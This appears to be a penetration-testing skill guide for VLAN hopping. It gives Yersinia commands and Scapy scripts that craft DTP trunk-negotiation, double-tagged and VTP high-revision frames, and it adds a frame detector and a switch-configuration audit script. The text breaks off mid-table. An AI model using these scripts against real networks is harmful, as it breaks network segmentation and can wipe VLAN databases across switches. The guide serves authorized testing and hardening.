performing-vlan-hopping-attack
Simulates VLAN hopping attacks using switch spoofing and double tagging techniques in authorized environments to test VLAN segmentation effectiveness and validate switch port security configurations against Layer 2 bypass attacks.
# Performing VLAN Hopping Attack
## When to Use
- Testing the effectiveness of VLAN-based network segmentation during authorized penetration tests
- Validating that switch trunk port configurations prevent unauthorized VLAN access
- Assessing whether 802.1Q tagging and native VLAN configurations resist double-tagging attacks
- Demonstrating to network teams why proper switch hardening is critical for isolation between zones
- Verifying that DTP (Dynamic Trunking Protocol) is disabled on all access ports
**Do not use** on production switches without explicit authorization and change management approval, against critical infrastructure VLANs (SCADA, medical devices) without safety controls, or as a denial-of-service vector.
## Prerequisites
- Written authorization specifying in-scope VLANs and switches for testing
- Physical or virtual access to a switch access port on the target network
- Yersinia, Scapy, and frogger VLAN hopping tools installed on Kali Linux
- Understanding of 802.1Q trunking, DTP, and VLAN tagging at the frame level
- Access to switch CLI for verification of configurations (read-only is sufficient)
- Wireshark for capturing and verifying tagged frames
> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
## Workflow
### Step 1: Enumerate VLAN Configuration
```bash
# Identify the current VLAN assignment of the attacker port
ip link show eth0
cat /proc/net/vlan/config 2>/dev/null
# Use CDP/LLDP to discover switch information
sudo tcpdump -nn -v -i eth0 -s 1500 -c 1 'ether proto 0x88cc' 2>/dev/null
# Or use lldpd
lldpcli show neighbors
# If CDP is enabled, capture CDP frames
sudo tcpdump -nn -v -i eth0 -s 1500 -c 1 'ether[20:2] == 0x2000'
# Use Yersinia to discover DTP and VTP information
sudo yersinia -G &
# Or command line:
sudo yersinia dtp -attack 0 -interface eth0
# This listens for DTP frames to learn trunk negotiation status
# Nmap to identify hosts on other VLANs (if routing exists)
nmap -sn 10.10.10.0/24 10.10.20.0/24 10.10.30.0/24
```
### Step 2: Attempt Switch Spoofing (DTP Attack)
```bash
# Use Yersinia to send DTP frames and negotiate a trunk
sudo yersinia dtp -attack 1 -interface eth0
# This sends DTP desirable frames to convert the access port to a trunk
# If successful, the port becomes a trunk carrying all VLANs
# Alternatively, use Scapy to craft DTP frames
python3 << 'PYEOF'
from scapy.all import *
from scapy.contrib.dtp import *
# Send DTP desirable frame to negotiate trunk
dtp_frame = (
    Ether(dst="01:00:0c:cc:cc:cc", src=get_if_hwaddr("eth0")) /
    LLC(dsap=0xaa, ssap=0xaa, ctrl=3) /
    SNAP(OUI=0x00000c, code=0x2004) /
    DTP(tlvlist=[
        DTPDomain(type=0x0001, domain=""),
        DTPStatus(type=0x0002, status=b"\x03"),   # Desirable
        DTPType(type=0x0003, dtptype=b"\xa5"),    # 802.1Q trunk
        DTPNeighbor(type=0x0004, neighbor=get_if_hwaddr("eth0"))
    ])
)
sendp(dtp_frame, iface="eth0", count=10, inter=1)
print("[*] DTP desirable frames sent. Check if trunk is negotiated.")
PYEOF
# If trunk negotiation succeeds, verify by capturing tagged frames
sudo tcpdump -en -i eth0 'vlan' -c 10
# Create VLAN subinterfaces to access other VLANs
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.10 type vlan id 10
sudo ip addr add 10.10.10.99/24 dev eth0.10
sudo ip link set eth0.10 up
sudo ip link add link eth0 name eth0.20 type vlan id 20
sudo ip addr add 10.10.20.99/24 dev eth0.20
sudo ip link set eth0.20 up
# Verify access to other VLANs
ping -c 3 10.10.10.1
ping -c 3 10.10.20.1
```
### Step 3: Attempt Double Tagging Attack
```bash
# Double tagging works when:
# 1. Attacker is on the native VLAN of the trunk
# 2. Target VLAN is different from the native VLAN
# 3. The switch strips the outer tag and forwards the inner tag
python3 << 'PYEOF'
from scapy.all import *
# Craft double-tagged frame
# Outer tag: Native VLAN (e.g., VLAN 1)
# Inner tag: Target VLAN (e.g., VLAN 20 - server VLAN)
target_ip = "10.10.20.10"
target_mac = "ff:ff:ff:ff:ff:ff"
double_tagged = (
    Ether(dst=target_mac, src=get_if_hwaddr("eth0")) /
    Dot1Q(vlan=1) /    # Outer tag: native VLAN (will be stripped)
    Dot1Q(vlan=20) /   # Inner tag: target VLAN (will be forwarded)
    IP(dst=target_ip, src="10.10.20.99") /
    ICMP(type=8)       # Echo request
)
# Send the double-tagged frame
sendp(double_tagged, iface="eth0", count=5, inter=1)
print("[*] Double-tagged frames sent targeting VLAN 20")
print("[!] Note: Double tagging is unidirectional - no responses expected")
PYEOF
# Use frogger for automated VLAN hopping
# frogger identifies native VLAN and attempts double tagging
sudo frogger
# Verify with Wireshark capture on the target VLAN (if possible)
# On a monitoring port in VLAN 20:
tshark -i eth1 -Y "vlan.id == 20 and icmp" -c 10
```
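The detection side of Steps 2 and 3, as an added example that is not part of this skill or of the tools it lists: a dependency-free Python decoder that walks a raw Ethernet frame, counts stacked 802.1Q tags and recognises a DTP trunk-negotiation frame on the Cisco multicast address, which is what a sensor or SPAN-port monitor on an access VLAN should flag while this test runs. The two sample frames are constructed inline (fake MAC addresses; the DTP status byte 0x03 is read as "desirable" to match the Scapy frame above), and `parse_frame`, `classify` and the `build_*` helpers are names chosen for this example.

```python
"""Detection helper for the Step 2/3 signatures (added example, dependency-free):
decode a raw Ethernet frame, count stacked 802.1Q tags and recognise a DTP
trunk-negotiation frame. Sample frames are constructed below, not captured."""
import struct
from dataclasses import dataclass, field
from typing import List, Optional

CISCO_MCAST = bytes.fromhex("01000ccccccc")  # destination of DTP/VTP/CDP frames
CISCO_OUI = b"\x00\x00\x0c"
TAG_ETHERTYPES = {0x8100, 0x88A8, 0x9100}     # 802.1Q, 802.1ad, legacy QinQ
DTP_PID = 0x2004                              # SNAP protocol id for DTP
DTP_STATUS_NAMES = {0x03: "desirable"}        # status byte as used by the Scapy frame above
DTP_TLV_STATUS = 2


@dataclass
class FrameInfo:
    dst: str
    src: str
    vlans: List[int] = field(default_factory=list)   # outer tag first
    ethertype: int = 0
    dtp_status: Optional[int] = None


def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def _dtp_status(body: bytes) -> Optional[int]:
    """Walk DTP TLVs (type:2, length:2 incl. header, value) after the version byte."""
    off = 1
    while off + 4 <= len(body):
        ttype, tlen = struct.unpack_from("!HH", body, off)
        if tlen < 4:
            break  # malformed TLV: stop instead of looping forever
        value = body[off + 4:off + tlen]
        if ttype == DTP_TLV_STATUS and value:
            return value[0]
        off += tlen
    return None


def parse_frame(raw: bytes) -> FrameInfo:
    dst, src = raw[:6], raw[6:12]
    info = FrameInfo(_mac(dst), _mac(src))
    off = 12
    etype = struct.unpack_from("!H", raw, off)[0]
    off += 2
    while etype in TAG_ETHERTYPES:               # peel every stacked tag
        tci = struct.unpack_from("!H", raw, off)[0]
        info.vlans.append(tci & 0x0FFF)
        etype = struct.unpack_from("!H", raw, off + 2)[0]
        off += 4
    info.ethertype = etype
    # A value <= 1500 is an 802.3 length field, so an LLC/SNAP header follows
    if etype <= 0x05DC and raw[off:off + 3] == b"\xaa\xaa\x03":
        oui = raw[off + 3:off + 6]
        pid = struct.unpack_from("!H", raw, off + 6)[0]
        if dst == CISCO_MCAST and oui == CISCO_OUI and pid == DTP_PID:
            info.dtp_status = _dtp_status(raw[off + 8:])
    return info


def classify(raw: bytes, port_is_access: bool = True) -> List[str]:
    """Alerts a sensor on an access port should raise for this frame."""
    info = parse_frame(raw)
    alerts = []
    if port_is_access and len(info.vlans) >= 2:
        alerts.append(f"double-tagged frame outer={info.vlans[0]} inner={info.vlans[1]}")
    if info.dtp_status is not None:
        name = DTP_STATUS_NAMES.get(info.dtp_status, f"0x{info.dtp_status:02x}")
        alerts.append(f"DTP frame from {info.src} status={name}")
    return alerts


# --- constructed samples (fake MAC addresses, no real capture) ---
SRC = bytes.fromhex("001122334455")


def build_double_tagged(outer: int, inner: int) -> bytes:
    """Broadcast frame with two 802.1Q tags and a dummy IPv4 payload."""
    return (b"\xff" * 6 + SRC
            + struct.pack("!HH", 0x8100, outer)
            + struct.pack("!HH", 0x8100, inner)
            + struct.pack("!H", 0x0800) + b"\x45" + b"\x00" * 19)


def build_dtp(status: int = 0x03) -> bytes:
    """DTP frame with the same four TLVs as the Scapy example (domain, status, type, neighbor)."""
    tlvs = (struct.pack("!HH", 1, 5) + b"\x00"
            + struct.pack("!HH", 2, 5) + bytes([status])
            + struct.pack("!HH", 3, 5) + b"\xa5"
            + struct.pack("!HH", 4, 10) + SRC)
    body = b"\xaa\xaa\x03" + CISCO_OUI + struct.pack("!H", DTP_PID) + b"\x01" + tlvs
    return CISCO_MCAST + SRC + struct.pack("!H", len(body)) + body


if __name__ == "__main__":
    for frame in (build_double_tagged(1, 20), build_dtp()):
        print(classify(frame) or ["no alert"])
```

Feed `classify` the frames from a capture on the access VLAN (for example via a pcap reader) and any double-tag or DTP alert while the port is configured as `static access` with `switchport nonegotiate` indicates either the test traffic or a gap in the hardening.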
### Step 4: Test VTP (VLAN Trunking Protocol) Attacks
```bash
# If VTP is in use, attempt to inject a VTP message with a higher revision number
# This can overwrite the VLAN database across all switches in the domain
python3 << 'PYEOF'
from scapy.all import *
# Craft a VTP version 2 summary advertisement with a high configuration revision
# WARNING: This can disrupt the entire VLAN domain if successful
# Layout: version(1) code(1) followers(1) domain-length(1) domain(32, padded)
#         revision(4) updater-identity(4) update-timestamp(12) MD5 digest(16)
domain = b"TEST"
vtp_frame = (
    Ether(dst="01:00:0c:cc:cc:cc", src=get_if_hwaddr("eth0")) /
    LLC(dsap=0xaa, ssap=0xaa, ctrl=3) /
    SNAP(OUI=0x00000c, code=0x2003) /
    Raw(load=(
        bytes([0x02, 0x01, 0x00, len(domain)])  # version 2, summary advert, no followers, domain length
        + domain.ljust(32, b"\x00")             # management domain name, padded to 32 bytes
        + (0xFFFF).to_bytes(4, "big")           # configuration revision 65535
        + b"\x00" * 4                           # updater identity
        + b"\x00" * 12                          # update timestamp
        + b"\x00" * 16                          # MD5 digest (zeros for lab; a switch that validates it discards the frame)
    ))
)
# Only send in authorized lab environments
sendp(vtp_frame, iface="eth0", count=1)
print("[*] VTP summary advertisement sent")
PYEOF
```
### Step 5: Verify Switch Configuration Weaknesses
```bash
# On the switch (with read access), check for misconfigurations:
# Check DTP status on access ports (should be nonegotiate)
# show interfaces <interface> switchport
# Expected: Administrative Mode: static access
# Negotiation of Trunking: Off
# Check native VLAN configuration (should not be VLAN 1)
# show interfaces trunk
# Expected: Native VLAN not matching any user VLAN
# Check VTP mode (should be transparent or off)
# show vtp status
# Expected: VTP Mode: Transparent
# Check unused ports are disabled
# show interfaces status | include disabled
# Verify port security is enabled
# show port-security
```
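A scripted version of the Step 5 checks, added here as an example and not part of this skill: it parses `show interfaces switchport` and `show vtp status` output and reports ports that still negotiate DTP, trunks whose native VLAN is 1 or overlaps a user access VLAN, and a VTP server mode. The IOS output is a constructed sample in the usual field layout (`Name:`, `Administrative Mode:`, `Negotiation of Trunking:`, `Trunking Native Mode VLAN:`); real output has more lines, which the parser ignores. `audit`, `parse_switchports` and `vlan_id` are names chosen for this example.

```python
"""Switch configuration audit for the Step 5 checks (added example; the IOS
output below is constructed, not captured from a real switch)."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of `show interfaces switchport`: one port left in dynamic
# mode, one hardened access port, and one trunk whose native VLAN is a user VLAN.
SAMPLE_SWITCHPORT = """\
Name: Gi1/0/1
Switchport: Enabled
Administrative Mode: dynamic desirable
Operational Mode: static access
Negotiation of Trunking: On
Access Mode VLAN: 10 (USERS)
Trunking Native Mode VLAN: 1 (default)

Name: Gi1/0/2
Switchport: Enabled
Administrative Mode: static access
Operational Mode: static access
Negotiation of Trunking: Off
Access Mode VLAN: 20 (SERVERS)
Trunking Native Mode VLAN: 1 (default)

Name: Gi1/0/24
Switchport: Enabled
Administrative Mode: trunk
Operational Mode: trunk
Negotiation of Trunking: On
Access Mode VLAN: 1 (default)
Trunking Native Mode VLAN: 20 (SERVERS)
"""

# Constructed sample line from `show vtp status`
SAMPLE_VTP = "VTP Operating Mode              : Server\n"

Finding = Tuple[str, str]  # (port name or "vtp", description)


def parse_switchports(text: str) -> List[Dict[str, str]]:
    """Split the per-port blocks (separated by blank lines) into 'Field: value' dicts."""
    ports = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields: Dict[str, str] = {}
        for line in block.splitlines():
            if ":" in line:
                key, value = line.split(":", 1)
                fields[key.strip()] = value.strip()
        if "Name" in fields:
            ports.append(fields)
    return ports


def vlan_id(value: str) -> Optional[int]:
    """'20 (SERVERS)' -> 20; None when the field is missing or malformed."""
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def audit(switchport_text: str, vtp_text: str) -> List[Finding]:
    ports = parse_switchports(switchport_text)
    findings: List[Finding] = []

    # VLANs carrying end-user traffic on hardened access ports; a trunk whose
    # native VLAN is one of these is the precondition for double tagging.
    user_vlans = {
        v for v in (vlan_id(p.get("Access Mode VLAN", ""))
                    for p in ports if p.get("Administrative Mode") == "static access")
        if v is not None
    }

    for p in ports:
        name = p["Name"]
        mode = p.get("Administrative Mode", "")
        negotiation = p.get("Negotiation of Trunking", "")
        native = vlan_id(p.get("Trunking Native Mode VLAN", ""))

        if mode.startswith("dynamic"):
            findings.append((name, f"DTP negotiation possible (Administrative Mode: {mode})"))
        elif negotiation == "On":
            findings.append((name, f"still answers DTP ({mode}); add 'switchport nonegotiate'"))

        if mode == "trunk":
            if native == 1:
                findings.append((name, "native VLAN is 1 (default)"))
            elif native in user_vlans:
                findings.append((name, f"native VLAN {native} is also a user access VLAN"))

    m = re.search(r"VTP Operating Mode\s*:\s*(\w+)", vtp_text)
    if m and m.group(1).lower() not in ("transparent", "off"):
        findings.append(("vtp", f"VTP Operating Mode: {m.group(1)}; use transparent or off"))
    return findings


if __name__ == "__main__":
    for port, issue in audit(SAMPLE_SWITCHPORT, SAMPLE_VTP):
        print(f"{port:10} {issue}")
```

Pipe the real command output into `audit` (read-only switch access is enough) and compare its findings with what the frame-level tests in Steps 2 and 3 actually achieved; a port the audit flags but the test could not hop confirms the control works in depth, while the reverse points at a check the audit does not yet cover.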
### Step 6: Document Findings and Remediation
```bash
# Clean up VLAN subinterfaces
sudo ip link del eth0.10 2>/dev/null
sudo ip link del eth0.20 2>/dev/null
# Stop any running attack tools
sudo killall yersinia 2>/dev/null
# Document all test results with timestamps
# (unquoted EOF delimiter so $(date) expands; a quoted 'EOF' would leave it literal)
cat > vlan_hopping_report.txt << EOF
VLAN Hopping Test Results
=========================
Test Date: $(date)
Tester: Security Assessment Team
Authorization: PENTEST-2024-0847
Test 1: DTP Switch Spoofing
Result: VULNERABLE - Port negotiated trunk in 3 seconds
Access gained to: VLANs 1, 10, 20, 30, 40
Test 2: Double Tagging
Result: VULNERABLE - Frames reached VLAN 20 from VLAN 1
Note: Unidirectional only (no return traffic)
Test 3: VTP Attack
Result: NOT TESTED - VTP in transparent mode
EOF
```
## Key Concepts
| Term | Definition |
|------|------------|
| **VLAN Hopping** | Layer 2 attack technique that allows an attacker to access traffic on VLANs they are not authorized to reach, bypassing ne